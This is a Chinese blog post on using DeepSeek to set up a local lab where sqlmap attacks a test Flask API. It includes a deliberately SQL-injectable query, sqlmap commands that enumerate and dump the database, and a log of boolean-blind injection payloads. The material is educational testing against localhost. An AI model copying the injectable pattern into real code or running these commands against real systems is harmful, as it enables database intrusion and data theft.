网络安全-使用DeepSeek来获取sqlmap的攻击payload

lady_killer92025-03-02 18:19

文章目录

概述

今天来使用DeepSeek做安全测试,看看在有思路的情况下实现的快不快。

DeepSeek使用

我有一个思路,想要测试sqlmap工具如何dump数据库的:

连接mysql数据库,创建测试库、表,表至少包含整型、字符型列,插入示例数据

使用Python Flask编写一个API查询数据库并返回内容

使用sqlmap攻击该API

查看API日志

请优化我的思路,并给出相关的代码

创建示例数据库

sql 复制代码 
-- 创建测试数据库
CREATE DATABASE sqlmap_test;

-- 创建包含多种数据类型的表
USE sqlmap_test;
CREATE TABLE users (
    id INT PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(50),
    email VARCHAR(100),
    age INT,
    created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
    profile TEXT,
    is_admin BOOLEAN DEFAULT FALSE
);

-- 插入测试数据
INSERT INTO users (username, email, age, profile, is_admin) VALUES
('admin', 'admin@example.com', 30, 'System Administrator', TRUE),
('user1', 'user1@test.com', 25, 'Regular user profile', FALSE),
('test_user', 'test@domain.com', 28, 'Another test user', FALSE);

创建API

python 复制代码 
# app.py
import json
from flask import Flask, request, jsonify
import pymysql
from datetime import datetime
import logging
from logging.handlers import RotatingFileHandler
from setting import *

app = Flask(__name__)

# 配置数据库连接
db_config = {
    "host": DB_HOST,
    "user": DB_USER,
    "password": DB_PASSWORD,
    "db": DB_NAME,
    "port": DB_PORT,
    "charset": "utf8mb4",
    "cursorclass": pymysql.cursors.DictCursor
}


# 配置日志系统
def setup_logger():
    # 清除默认处理程序
    app.logger.handlers.clear()

    # 统一日志格式
    formatter = logging.Formatter(
        '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'
    )

    # 访问日志配置
    access_handler = RotatingFileHandler(
        'access.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True  # 延迟文件打开直到实际写入
    )
    access_handler.setFormatter(formatter)
    access_handler.setLevel(logging.INFO)
    app.logger.addHandler(access_handler)
    app.logger.setLevel(logging.INFO)

    # SQL日志配置(独立logger)
    sql_handler = RotatingFileHandler(
        'sql.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True
    )
    sql_handler.setFormatter(formatter)
    sql_handler.setLevel(logging.INFO)

    sql_logger = logging.getLogger('sql')
    sql_logger.propagate = False  # 禁止传播到根logger
    sql_logger.setLevel(logging.INFO)
    sql_logger.addHandler(sql_handler)


# 确保在应用初始化后配置日志
setup_logger()


def get_db_connection():
    return pymysql.connect(**db_config)


@app.route('/users', methods=['GET'])
def get_users():
    search = request.args.get('search', '')
    # 强制立即刷新访问日志
    app.logger.info(f"Access: {request.method} {request.path} - Params: {dict(request.args)}")
    app.logger.handlers[0].flush()
    conn = get_db_connection()
    try:

        with conn.cursor() as cursor:
            # 存在漏洞的查询
            query = f"SELECT * FROM users WHERE username = '{search}'"

            # 记录SQL并强制刷新
            sql_logger = logging.getLogger('sql')
            sql_logger.info(f"EXECUTE SQL: {query}")
            sql_logger.handlers[0].flush()

            cursor.execute(query)
            results = cursor.fetchall()

        # 转换datetime为字符串
        for row in results:
            if 'created_at' in row and isinstance(row['created_at'], datetime):
                row['created_at'] = row['created_at'].isoformat()
        app.logger.info(json.dumps(results), exc_info=True)
        return jsonify(results)
    except pymysql.Error as e:
        # 记录完整错误信息
        error_msg = f"Database error ({e.args[0]}): {e.args[1]}"
        app.logger.error(error_msg, exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Database error"})
    except Exception as e:
        app.logger.error(f"Unexpected error: {str(e)}", exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Server error"})
    finally:
        if 'conn' in locals():
            conn.close()


if __name__ == '__main__':
    # 禁用重载器以避免重复日志
    app.run(host='0.0.0.0', port=5000, debug=False, use_reloader=False)

运行后访问

bash 复制代码 
http://127.0.0.1:5000/users?search=test_user

结果如下:

测试sqlmap

bash 复制代码 
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -dbs --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test --tables --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users --columns --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users -C id,username,is_admin -dump --dump-format csv --batch




整体来说,实现的还挺快的,只有API实现时微调了一下日志和响应码。

ps:话说我只是测试下DeepSeek,sqlmap咋还出错了,两个test_user是什么鬼...

部分日志

bash 复制代码 
[2025-03-01 21:55:51,918] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,058] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>54 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,139] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>52 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,258] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>53 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,343] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,600] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>48 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,682] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>9 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,814] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,819] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,829] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,898] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,167] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,197] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,266] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,284] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,318] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,372] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,406] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,408] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>106 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,576] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,670] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>97 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,724] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>109 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,738] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>99 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,739] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,740] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>105 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,838] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>109 AND 'FFDM'='FFDM'

参考

腾讯元宝
sqlmap

相关推荐
叶落阁主19 小时前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954483 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954483 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star3 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954483 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher5 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行8 天前
网络安全总结
安全·web安全
red1giant_star8 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04OpenClaw优化飞书API 额度已耗尽问题05本地部署 OpenClaw + DeepSeek-R1 完全指南06Window 10部署openclaw报错node.exe : npm error code 12807Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)09OpenClaw大龙虾机器人完整安装教程10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南